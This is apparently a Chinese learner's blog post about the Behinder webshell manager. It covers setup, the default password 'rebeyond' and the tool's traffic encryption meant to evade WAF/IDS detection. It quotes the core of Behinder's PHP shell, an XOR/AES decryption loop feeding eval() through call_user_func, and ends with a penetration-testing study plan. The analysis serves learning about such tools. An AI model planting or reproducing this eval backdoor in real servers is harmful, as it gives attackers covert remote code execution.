飞道的博客

Webshell管理工具:冰蝎和哥斯拉

516人阅读  评论(0)


简介和安装

简单介绍

  冰蝎是一个动态二进制加密的Webshell管理工具,第一代Webshell管理工具“菜刀”的流量特征非常明显,很容易被安全设备检测到。于是基于流量加密的Webshell越来越多,冰蝎应运而生,也取代了菜刀的地位。

  使用Java开发,所以可以跨平台使用。主要功能:基本信息、rce、虚拟终端、文件管理、Sockets代理、反弹shell、数据库管理、自定义代码等。相比菜刀的优点:

  1. Java开发,支持跨平台运行
  2. 使用加密隧道传输数据,尽可能避免流量被WAF或IDS设备所捕获
  3. 更新较为频繁,作者会听取社区的意见修改工具

安装和启动

  知识星球搜一下冰蝎,看到关于冰蝎的两篇文章,找到冰蝎的发布地址:
https://github.com/rebeyond/Behinder/releases。

  打开冰蝎软件发布地址,下载2021年4月19日发布的Behinder_v3.0 Beta 9.zip。
解压后打开文件夹,看到四个文件。

  配置环境:据说冰蝎只支持Jre6-Jre8。
尝试使用Java15版本,发现没有反应。使用Java1.8运行jar文件,启动成功。




查看server文件夹

  打开冰蝎的server目录,看到PHP、ASP、ASPX、JSP等shell文件。

  查看shell文件的代码,发现都是二十行左右的代码量,默认连接密码都是rebeyond。


代码分析

  安全软件的使用某种程度上相当浅显,越来越认识到,安全人才对代码水平的要求甚至比程序员的还要高。虽然开发是一件快乐的事,但还是希望能少掉点头发。

分析shell.php第一遍

  使用error_reporting()函数对报错进行设置,关闭错误报告,就把参数设置为0。使用符号@忽略该表达式可能生成的报错信息。

  使用session_start()函数启动或重用会话,成功启动会初始化超级变量$_SESSION
  把密钥赋值给变量$_session[‘k’],再使用session_write_close()函数结束当前session,保留session数据。

  传参方式采用file_get_contents("php://input"),可以获取请求的原始数据。
(与POST参数方式的区别?有心情了另开一篇文章)

  使用extension_loaded('openssl')检查openssl扩展是否加载。
如果没有加载openssl,首先以变量嵌套方式对post数据进行base64解密,然后再加密。
如果加载了openssl,直接使用openssl_decrype()函数,结合key对post数据进行AES解密。

	for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}

  使用explode()函数,用 |分隔第一次处理后的post参数。

	$arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);

查看软件源码

  在Github发布地址上下载source.zip和source.tar.gz文件,使用Bandizip解压文件,
打开之后发现只有一个ReadMe.md文档,GZ压缩包还有一个pax_global_header文件。
看样子冰蝎目前并没有开源。

  在ReadMe.md文档中看到了作者写的几篇文章,这个有点意思。

“冰蝎”动态二进制加密网站管理客户端

功能介绍原文链接:
	《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799
	
工作原理原文链接:
	《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744
	《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758
	《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774


反思

  编程也好,代码审计也好,做安全都离不开。

  不要急。看了一下近来半个月写的文章,与当下的学习路线:
  非紧要耗费五天左右:Python爬虫和扫描器、微信内置浏览器漏洞、IP溯源实验。
  紧要:子域名和域、MySQL、Redis、Weblogic、Linux权限维持、上线提权3389。SQLMap扫描器、Goby扫描器、Bscan扫描器、Cobalt Strike软件、冰蝎软件等。

  当下学习路线:
1.Owasp top10,理论落地,包括部署和挖掘7*10。
2.追洞,常用框架的漏洞复现和利用。

  第二阶段:内网渗透。代码审计,钻研某种编程语言,挖0day。

  第三阶段:工具开发、重学密码学。逆向分析,二进制漏洞……

  短期计划:
黑盒漏洞XSS、CSRF、SSRF、文件上传和webshell免杀、子域名信息收集、文件下载、SQL注入、通用型漏洞追踪和利用。
建立目录收集和字典收集的方式和流程。整理常用的扫描器,可适当分析。
反序列化漏洞的追踪调试、权限提升、越权。
  随便看看(有视频):内网主机信息收集、Win域内提权、Win域内横向、后渗透持久化技术。

  周计划:
  黑盒2点——XSS、文件上传和Webshell免杀、以及提权。部署XSS利用环境、冰蝎哥斯拉。漏洞探测、验证、绕过。
  通用型框架漏洞——Weblogic和solor的复现、探测、利用和提权。



转载:https://blog.csdn.net/soldi_er/article/details/116011715
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场